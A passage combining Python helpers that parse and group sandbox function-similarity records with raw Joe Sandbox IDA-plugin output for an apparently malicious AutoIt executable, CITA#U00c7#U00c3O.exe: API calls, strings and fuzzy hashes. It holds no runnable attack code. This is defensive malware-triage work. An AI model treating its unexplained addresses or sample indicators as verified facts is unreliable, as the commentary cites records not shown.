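def tag_entry(entry: FunctionEntry) -> List[str]:
    names = {c.name for c in entry.apis}
    return [label for needed, label in API_TAGS if needed <= names]

def group_by_api_string_id(entries: List[FunctionEntry]) -> Dict[str, List[str]]:
    """Map 'API String ID' to the first call-site address of every function carrying it."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        if e.apis and e.fields.get("API String ID"):
            groups[e.fields["API String ID"]].append(e.apis[0].ref)
    return dict(groups)
```

Calling parse_report(SAMPLE_REPORT) yields four records; group_by_api_string_id puts 00472B63 and 00472BB2 under 2889604237-0 while their Opcode IDs differ, which is exactly the "same imports, different code" case the fuzzy hashes are meant to expose. Tags are matched on direct calls only; subcall lines are kept on the record so a caller can widen the match, but they describe the callee, not the function listed. On a full report the same grouping also collapses CRT-only helpers such as the _memmove and _strncmp entries, so treat a shared ID as a prompt to compare the fuzzy hashes, not as a verdict.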
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: \
                                                      • API String ID: 4104443479-2967466578
                                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00466825
                                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                      APIs
                                                      • _strlen.LIBCMT ref: 0040F858
                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                      • _sprintf.LIBCMT ref: 0040F9AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_sprintf_strlen
                                                      • String ID: %02X
                                                      • API String ID: 1921645428-436463671
                                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: htonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 3832099526-2422070025
                                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: <local>
                                                      • API String ID: 2038078732-4266983199
                                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: u,D
                                                      • API String ID: 4104443479-3858472334
                                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                      APIs
                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • wsprintfW.USER32 ref: 0045612A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_mallocwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 1262938277-328681919
• Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
• Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
• Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
• Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
• Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
• Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
APIs
Strings
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
• API String ID: 1735881322-2289546076
• Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
• Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
• Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
• Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D